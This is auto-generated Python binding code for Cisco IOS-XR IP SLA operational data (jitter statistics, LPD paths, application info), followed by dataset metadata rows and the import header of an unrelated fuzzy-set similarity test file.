self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('op_type', YLeaf(YType.enumeration, 'op-type')),
])
self.op_type = None
self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats()
self.icmp_path_jitter_stats.parent = self
self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
self._children_yang_names.add("icmp-path-jitter-stats")
self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats()
self.udp_jitter_stats.parent = self
self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
self._children_yang_names.add("udp-jitter-stats")
self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
"""
icmp path jitter stats
.. attribute:: source_address
IP Address of the source
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dest_address
IP Address of the destination
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: hop_address
IP address of the hop in the path
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: packet_interval
Interval between echos in ms
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packet_count
Number of Echo replies received
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_count
Number of packets lost
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sequence_count
Number of out of sequence packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_sample_count
Number of discarded samples
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_errors_count
Number of packets with data corruption
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_error_count
Number of packets dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter
Jitter value for this node in the path
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum
Sum of positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum2
Sum of squares of positive jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pos_jitter_min
Minimum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_max
Maximum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_count
Number of positive jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum
Sum of negative jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_min
Minimum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_max
Maximum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum2
Sum of squares of negative jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: neg_jitter_count
Number of negative jitter values
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats, self).__init__()
self.yang_name = "icmp-path-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_address', YLeaf(YType.str, 'source-address')),
('dest_address', YLeaf(YType.str, 'dest-address')),
('hop_address', YLeaf(YType.str, 'hop-address')),
('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('packet_count', YLeaf(YType.uint32, 'packet-count')),
('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
('jitter', YLeaf(YType.uint32, 'jitter')),
('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
])
self.source_address = None
self.dest_address = None
self.hop_address = None
self.packet_interval = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.packet_count = None
self.packet_loss_count = None
self.out_of_sequence_count = None
self.discarded_sample_count = None
self.verify_errors_count = None
self.dropped_error_count = None
self.jitter = None
self.pos_jitter_sum = None
self.pos_jitter_sum2 = None
self.pos_jitter_min = None
self.pos_jitter_max = None
self.pos_jitter_count = None
self.neg_jitter_sum = None
self.neg_jitter_min = None
self.neg_jitter_max = None
self.neg_jitter_sum2 = None
self.neg_jitter_count = None
self._segment_path = lambda: "icmp-path-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
"""
udp jitter stats
.. attribute:: jitter_in
Input Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter_out
Output Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_sd
Packets lost in source to destination (SD) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_ds
Packets lost in destination to source (DS) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_out_of_sequence
Packets out of sequence
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_mia
Packets missing in action (cannot determine if theywere lost in SD or DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_skipped
Packets which are skipped
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_late_arrivals
Packets arriving late
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_invalid_tstamp
Packets with bad timestamps
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_errors_count
Number of internal errors
**type**\: int
**range:** 0..4294967295
.. attribute:: busies_count
Number of busies
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_sd_sum2
Sum of squares of positive jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_sd_min
Minimum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_max
Maximum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_count
Number of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_sd_sum2
Sum of squares of negative jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_sd_min
Minimum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_max
Maximum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_count
Number of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_ds_sum2
Sum of squares of positive jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_ds_min
Minimum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_max
Maximum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_count
Number of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_ds_sum2
Sum of squares of negative jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_ds_min
Minimum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_max
Maximum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_count
Number of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_count
Number of probe/probe\-response pairs used to compute one\-way statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_min
Minimum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_max
Maximum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum
Sum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum2
Sum of squares of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: one_way_ds_min
Minimum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_max
Maximum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum
Sum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum2
Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats, self).__init__()
self.yang_name = "udp-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
('busies_count', YLeaf(YType.uint32, 'busies-count')),
('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
])
self.jitter_in = None
self.jitter_out = None
self.packet_loss_sd = None
self.packet_loss_ds = None
self.packet_out_of_sequence = None
self.packet_mia = None
self.packet_skipped = None
self.packet_late_arrivals = None
self.packet_invalid_tstamp = None
self.internal_errors_count = None
self.busies_count = None
self.positive_sd_sum = None
self.positive_sd_sum2 = None
self.positive_sd_min = None
self.positive_sd_max = None
self.positive_sd_count = None
self.negative_sd_sum = None
self.negative_sd_sum2 = None
self.negative_sd_min = None
self.negative_sd_max = None
self.negative_sd_count = None
self.positive_ds_sum = None
self.positive_ds_sum2 = None
self.positive_ds_min = None
self.positive_ds_max = None
self.positive_ds_count = None
self.negative_ds_sum = None
self.negative_ds_sum2 = None
self.negative_ds_min = None
self.negative_ds_max = None
self.negative_ds_count = None
self.one_way_count = None
self.one_way_sd_min = None
self.one_way_sd_max = None
self.one_way_sd_sum = None
self.one_way_sd_sum2 = None
self.one_way_ds_min = None
self.one_way_ds_max = None
self.one_way_ds_sum = None
self.one_way_ds_sum2 = None
self._segment_path = lambda: "udp-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class LpdPaths(Entity):
"""
List of latest LPD paths
.. attribute:: lpd_path
Latest path statistics of MPLS LSP group operation
**type**\: list of :py:class:`LpdPath <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths, self).__init__()
self.yang_name = "lpd-paths"
self.yang_parent_name = "non-distributed"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("lpd-path", ("lpd_path", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath))])
self._leafs = OrderedDict()
self.lpd_path = YList(self)
self._segment_path = lambda: "lpd-paths"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths, [], name, value)
class LpdPath(Entity):
"""
Latest path statistics of MPLS LSP
group operation
.. attribute:: path_index (key)
LPD path index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: path_id
LPD path identifier
**type**\: :py:class:`PathId <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId>`
.. attribute:: return_code
Path return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath, self).__init__()
self.yang_name = "lpd-path"
self.yang_parent_name = "lpd-paths"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['path_index']
self._child_container_classes = OrderedDict([("path-id", ("path_id", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('path_index', YLeaf(YType.int32, 'path-index')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
])
self.path_index = None
self.return_code = None
self.path_id = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId()
self.path_id.parent = self
self._children_name_map["path_id"] = "path-id"
self._children_yang_names.add("path-id")
self._segment_path = lambda: "lpd-path" + "[path-index='" + str(self.path_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath, ['path_index', 'return_code'], name, value)
class PathId(Entity):
"""
LPD path identifier
.. attribute:: lsp_selector
LSP selector
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: output_interface
Output interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9./\-]+
.. attribute:: nexthop_address
Nexthop address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: downstream_label
Downstream label stacks
**type**\: list of int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId, self).__init__()
self.yang_name = "path-id"
self.yang_parent_name = "lpd-path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsp_selector', YLeaf(YType.str, 'lsp-selector')),
('output_interface', YLeaf(YType.str, 'output-interface')),
('nexthop_address', YLeaf(YType.str, 'nexthop-address')),
('downstream_label', YLeafList(YType.uint32, 'downstream-label')),
])
self.lsp_selector = None
self.output_interface = None
self.nexthop_address = None
self.downstream_label = []
self._segment_path = lambda: "path-id"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId, ['lsp_selector', 'output_interface', 'nexthop_address', 'downstream_label'], name, value)
class ApplicationInfo(Entity):
"""
IPSLA application information
.. attribute:: version
Version of the IPSLA in Version.Release .Patch\-level format
**type**\: str
.. attribute:: max_entries
Maximum number of entries
**type**\: int
**range:** 0..4294967295
.. attribute:: entries_configured
Number of entries configured
**type**\: int
**range:** 0..4294967295
.. attribute:: active_entries
Number of active entries
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_entries
Number of pending entries
**type**\: int
**range:** 0..4294967295
.. attribute:: inactive_entries
Number of inactive entries
**type**\: int
**range:** 0..4294967295
.. attribute:: configurable_probes
Number of configurable probes
**type**\: int
**range:** 0..4294967295
.. attribute:: min_memory
IPSLA low memory watermark in KB
**type**\: int
**range:** 0..4294967295
.. attribute:: hw_timestamp_disabled
IPSLA HW timestamp Disabled flag
**type**\: bool
.. attribute:: operation_type
Operation types available in this IPSLA version
**type**\: list of :py:class:`SlaOpTypes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.SlaOpTypes>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.ApplicationInfo, self).__init__()
self.yang_name = "application-info"
self.yang_parent_name = "ipsla"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('version', YLeaf(YType.str, 'version')),
('max_entries', YLeaf(YType.uint32, 'max-entries')),
('entries_configured', YLeaf(YType.uint32, 'entries-configured')),
('active_entries', YLeaf(YType.uint32, 'active-entries')),
('pending_entries', YLeaf(YType.uint32, 'pending-entries')),
('inactive_entries', YLeaf(YType.uint32, 'inactive-entries')),
('configurable_probes', YLeaf(YType.uint32, 'configurable-probes')),
('min_memory', YLeaf(YType.uint32, 'min-memory')),
('hw_timestamp_disabled', YLeaf(YType.boolean, 'hw-timestamp-disabled')),
('operation_type', YLeafList(YType.enumeration, 'operation-type')),
])
self.version = None
self.max_entries = None
self.entries_configured = None
self.active_entries = None
self.pending_entries = None
self.inactive_entries = None
self.configurable_probes = None
self.min_memory = None
self.hw_timestamp_disabled = None
self.operation_type = []
self._segment_path = lambda: "application-info"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.ApplicationInfo, ['version', 'max_entries', 'entries_configured', 'active_entries', 'pending_entries', 'inactive_entries', 'configurable_probes', 'min_memory', 'hw_timestamp_disabled', 'operation_type'], name, value)
def clone_ptr(self):
self._top_entity = Ipsla()
return self._top_entity
| 66.893302
| 1,053
| 0.329499
| 52,927
| 875,834
| 5.198934
| 0.011204
| 0.02291
| 0.02996
| 0.03137
| 0.952843
| 0.932749
| 0.905438
| 0.888125
| 0.87872
| 0.866658
| 0
| 0.041522
| 0.600898
| 875,834
| 13,092
| 1,054
| 66.898411
| 0.745679
| 0.187952
| 0
| 0.802074
| 0
| 0.001353
| 0.126673
| 0.021248
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057259
| false
| 0
| 0.001127
| 0
| 0.11587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d3b69e8cb26ebf814af4590bd2d7166bc2629180
| 67,399
|
py
|
Python
|
fsmpy/tests/test_similarities.py
|
GCidd/fsmpy
|
131e81925481b3fe608f2c1945bbb00a8b674e72
|
[
"BSD-3-Clause"
] | 1
|
2022-01-31T07:01:59.000Z
|
2022-01-31T07:01:59.000Z
|
fsmpy/tests/test_similarities.py
|
GCidd/fsmpy
|
131e81925481b3fe608f2c1945bbb00a8b674e72
|
[
"BSD-3-Clause"
] | null | null | null |
fsmpy/tests/test_similarities.py
|
GCidd/fsmpy
|
131e81925481b3fe608f2c1945bbb00a8b674e72
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from numpy.testing import assert_almost_equal
from numpy.testing import assert_equal
from fsmpy.datasets import load_patients_diagnoses
from fsmpy.sets import IntuitionisticFuzzySet
from fsmpy.similarities import chen_1, hung_yang_4, hung_yang_3, hung_yang_2, hwang_yang, park_kwun_lim, ye, hung_yang_1, julian_hung_lin, zhang_fu
from fsmpy.similarities import mitchell, iancu, liang_shi, dengfeng_chuntian, hong_kim, chen_cheng_lan, song_wang_lei_xue
from fsmpy.similarities import liu, chen_2
from fsmpy.similarities import dengfeng_chuntian, hong_kim, song_wang_lei_xue, muthukumar_krishnanb, nguyen, deng_jiang_fu
from fsmpy import LIANG_SHI_SIMILARITY_1, LIANG_SHI_SIMILARITY_2, LIANG_SHI_SIMILARITY_3
from fsmpy import HUNG_YANG_3_SIMILARITY_1, HUNG_YANG_3_SIMILARITY_2, HUNG_YANG_3_SIMILARITY_3, \
HUNG_YANG_3_SIMILARITY_4, HUNG_YANG_3_SIMILARITY_5, HUNG_YANG_3_SIMILARITY_6, HUNG_YANG_3_SIMILARITY_7
from fsmpy import DENG_JIANG_FU_MONOTONIC_TYPE_1_1, DENG_JIANG_FU_MONOTONIC_TYPE_1_2, \
DENG_JIANG_FU_MONOTONIC_TYPE_1_3, DENG_JIANG_FU_MONOTONIC_TYPE_1_4, DENG_JIANG_FU_MONOTONIC_TYPE_2_1, \
DENG_JIANG_FU_MONOTONIC_TYPE_2_2, DENG_JIANG_FU_MONOTONIC_TYPE_2_3, DENG_JIANG_FU_MONOTONIC_TYPE_2_4, \
DENG_JIANG_FU_MONOTONIC_TYPE_3_1, DENG_JIANG_FU_MONOTONIC_TYPE_3_2, DENG_JIANG_FU_MONOTONIC_TYPE_3_3
from fsmpy import IANCU_SIMILARITY_1, IANCU_SIMILARITY_2, IANCU_SIMILARITY_3, IANCU_SIMILARITY_4, \
IANCU_SIMILARITY_5, IANCU_SIMILARITY_6, IANCU_SIMILARITY_7, IANCU_SIMILARITY_8, IANCU_SIMILARITY_9, \
IANCU_SIMILARITY_10, IANCU_SIMILARITY_11, IANCU_SIMILARITY_12, IANCU_SIMILARITY_13, IANCU_SIMILARITY_14,\
IANCU_SIMILARITY_15, IANCU_SIMILARITY_16, IANCU_SIMILARITY_17, IANCU_SIMILARITY_18, IANCU_SIMILARITY_19, \
